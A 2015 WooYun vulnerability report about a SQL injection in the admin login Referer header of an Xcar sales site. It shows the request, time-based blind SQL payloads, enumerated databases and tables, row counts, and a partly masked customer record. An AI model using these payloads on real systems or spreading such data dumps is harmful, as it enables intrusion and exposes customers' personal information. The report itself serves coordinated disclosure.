当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092695

漏洞标题:爱卡某站管理登陆处SQL注入泄露大量订单信息

相关厂商:爱卡汽车网

漏洞作者: 紫霞仙子

提交时间:2015-01-19 16:32

修复时间:2015-03-05 16:34

公开时间:2015-03-05 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开

简要描述:

233
备注:*的部分都是代替了某些真实数据,一个*有时候不是只代替一个数字。

详细说明:

我有来了!!!花了好长时间才发现这个注入点、
登陆地址:http://sales.xcar.com.cn/admin/login.php
登陆的时候有个Referer参数
GET /admin/ HTTP/1.1
Referer: * ------------这里
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=72e891a73d852c734bb02f1678aa5e64; urllog_mkey=1421512336.53
Host: sales.xcar.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

漏洞证明:

因为是老熟人了,知道爱卡不喜欢别人把数据库贴出来。
所以漏洞证明就贴那么多了。只证明下漏洞真实性。

---
Parameter: Referer (Referer)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/'||(SELECT 'kWPQ' FROM DUAL WHERE 6984=6984 AND SLEEP(5))||'
Parameter: Referer #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: if(now()=sysdate(),sleep(0),0)/'||(SELECT 'FNqk' FROM DUAL WHERE 5202=5202 AND SLEEP(5))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] sal*
[*] test
Database: sal*
[99 tables] 99张表
下来就来看看表中有多少信息、
惊喜来了。(可以看到订单信息(name,tel,address),会员信息,价格信息等等)
select count(*) from vi*: '54099'
select count(*) from or*: '15420'
select count(*) from order*car: '15269971' 这是一千五百多万么?
select count(*) from vip*order: '6425'
vi*表中字段:
| id | fuid | caid | cityid | sale_uid | tel | telc | telb | mapy | name | is4s | sdate | isdel | ischk | edatq | ytype | namepy | coname | vippass | coaname | address | vipuser | link_name | premission | contractnum |
有name,tel,vipuser,vippass,address这够么?
看了前几条数据,
举例:用户gocarpric**,密码弱口令,
其他密码123456的有112233的,还有aaa*的,(这里提下)
再看一个表:
Table: ord*
[15420 entries]
+----+-----------+--------+---------+-----------+------------------+--------------+-------------------+--------+----------+--------------+-------------------+----------+-------+--------+------------------------+---------------------------------+---------------+---------------------------+--------------------------------------+----------------------------+-----------------+-----------------------------------------------------------+
| id | jid | xcarid | cityid | mid_add | mid_edit | qq | tel | sex | tag | note | tel2 | name | paytp | issend | dt_add | dt_edit | whenbuy | looked_vipt | sale_otqer_now | sale_prkce_now | scly_otheu_wait | sple_qricu_wcit( |
+----+-----------+--------+---------+-----------+------------------+--------------+-------------------+--------+----------+--------------+-------------------+----------+-------+--------+------------------------+---------------------------------+---------------+---------------------------+--------------------------------------+----------------------------+-----------------+-----------------------------------------------------------+
| * | 10000000C | 0AC | 198 | 2 | 2 | 183***06 | 486***17*708 | 0 | 02 | ir | 3865*707* | 咛炜华 | 0 | 0 | 2013-07/01 19:23:A2 | 2013-07-01 29:23:02 | Ut | <blank> | * | *t | <blank> | <blank> |
到此为止!!!

修复方案:

1,首先得修复问题
2,记得你们问我要过联系方式,不过一直没礼物。
3,不求礼物,只求20rank!!!

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-19 16:46

厂商回复:

感谢@路人甲大侠的帮助,我们会尽快修复!要过联系方式肯定会发小礼物的,白帽子的帮助不会忘记!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-19 16:58 | r3nty ( 路人 | Rank:2 漏洞数:3 )

    沙发!

  2. 2015-03-04 11:34 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:98 | 天天向上 !!!)

    还没修复还是修复没改状态?@爱卡汽车网